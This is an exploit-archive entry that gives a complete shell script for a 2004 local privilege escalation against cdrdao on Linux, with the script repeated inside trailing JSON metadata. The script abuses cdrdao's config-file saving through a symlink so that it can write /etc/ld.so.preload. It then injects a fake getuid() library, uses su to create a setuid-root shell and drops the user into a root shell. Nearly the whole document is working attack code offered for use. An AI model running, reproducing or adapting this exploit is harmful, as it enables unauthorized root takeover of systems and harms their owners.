ID 1337DAY-ID-7357
Type zdt
Reporter Karol Wi?sek
Modified 2004-09-07T00:00:00
Description
Exploit for linux platform in category local exploits
=========================
CDRDAO Local Root Exploit
=========================
#!/bin/sh
DIR=`pwd`
echo ""
echo "cdrdao local root exploit - gr doesn't protect you this time"
echo "Karol Wi?sek <appelast*drumnbass.art.pl>"
echo ""
sleep 2
umask 000
echo -n "[*] Checking if /etc/ld.so.preload doesn't exist ... "
if [ -f /etc/ld.so.preload ]; then
echo "WRONG"
echo "/etc/ld.so.preload exists, write another exploit ;P"
exit
else
echo "OK"
fi
echo -n "[*] Checking if su is setuid ... "
if [ -u /bin/su ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Creating evil *uid() library ... "
cat > getuid_lib.c << _EOF
int getuid(void) {
return 0; }
_EOF
gcc -o getuid_lib.o -c getuid_lib.c
ld -shared -o getuid_lib.so getuid_lib.o
rm -f getuid_lib.c getuid_lib.o
if [ -f ./getuid_lib.so ]; then
echo "OK"
else
echo "WRONG"
fi
echo -n "[*] Creating suidshell ... "
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
unlink("./suid");
execl("/bin/sh","sh",0); }
_EOF
gcc -o suid suid.c
rm -f suid.c
if [ -x ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Exploiting cdrdao ... "
ln -sf /etc/ld.so.preload $HOME/.cdrdao
if [ ! -L $HOME/.cdrdao ];then
echo "Could'n link to \$HOME/.cdrdao"
exit
fi
cdrdao unlock --save 2>/dev/null
>/etc/ld.so.preload
echo "$DIR/getuid_lib.so" > /etc/ld.so.preload
su - -c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"
if [ -s ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
rm -f getuid_lib.so
unlink $HOME/.cdrdao
echo "Entering rootshell ... ;]"
./suid
# 0day.today [2018-01-26] #
{"id": "1337DAY-ID-7357", "type": "zdt", "bulletinFamily": "exploit", "title": "CDRDAO Local Root Exploit", "description": "Exploit for linux platform in category local exploits", "published": "2004-09-07T00:00:00", "modified": "2004-09-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/7357", "reporter": "Karol Wi?sek", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-27T01:08:57", "viewCount": 6, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/7357", "sourceData": "=========================\r\nCDRDAO Local Root Exploit\r\n=========================\r\n\r\n\r\n#!/bin/sh\r\nDIR=`pwd`\r\necho \"\"\r\necho \"cdrdao local root exploit - gr doesn't protect you this time\"\r\necho \"Karol Wi?sek <appelast*drumnbass.art.pl>\"\r\necho \"\"\r\nsleep 2\r\numask 000\r\necho -n \"[*] Checking if /etc/ld.so.preload doesn't exist ... \"\r\nif [ -f /etc/ld.so.preload ]; then\r\necho \"WRONG\"\r\necho \"/etc/ld.so.preload exists, write another exploit ;P\"\r\nexit\r\nelse\r\necho \"OK\"\r\nfi\r\necho -n \"[*] Checking if su is setuid ... \"\r\nif [ -u /bin/su ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Creating evil *uid() library ... \"\r\ncat > getuid_lib.c << _EOF\r\nint getuid(void) {\r\nreturn 0; }\r\n_EOF\r\ngcc -o getuid_lib.o -c getuid_lib.c\r\nld -shared -o getuid_lib.so getuid_lib.o\r\nrm -f getuid_lib.c getuid_lib.o\r\nif [ -f ./getuid_lib.so ]; then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nfi\r\necho -n \"[*] Creating suidshell ... \"\r\ncat > suid.c << _EOF\r\nint main(void) {\r\nsetgid(0); setuid(0);\r\nunlink(\"./suid\");\r\nexecl(\"/bin/sh\",\"sh\",0); }\r\n_EOF\r\ngcc -o suid suid.c\r\nrm -f suid.c\r\nif [ -x ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Exploiting cdrdao ... \"\r\nln -sf /etc/ld.so.preload $HOME/.cdrdao\r\nif [ ! -L $HOME/.cdrdao ];then\r\necho \"Could'n link to \\$HOME/.cdrdao\"\r\nexit\r\nfi\r\ncdrdao unlock --save 2>/dev/null\r\n>/etc/ld.so.preload\r\necho \"$DIR/getuid_lib.so\" > /etc/ld.so.preload\r\nsu - -c \"rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid\"\r\nif [ -s ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\nrm -f getuid_lib.so\r\nunlink $HOME/.cdrdao\r\necho \"Entering rootshell ... ;]\"\r\n./suid\r\n\r\n\r\n\n# 0day.today [2018-01-26] #", "_state": {"dependencies": 1645399856}}
{}
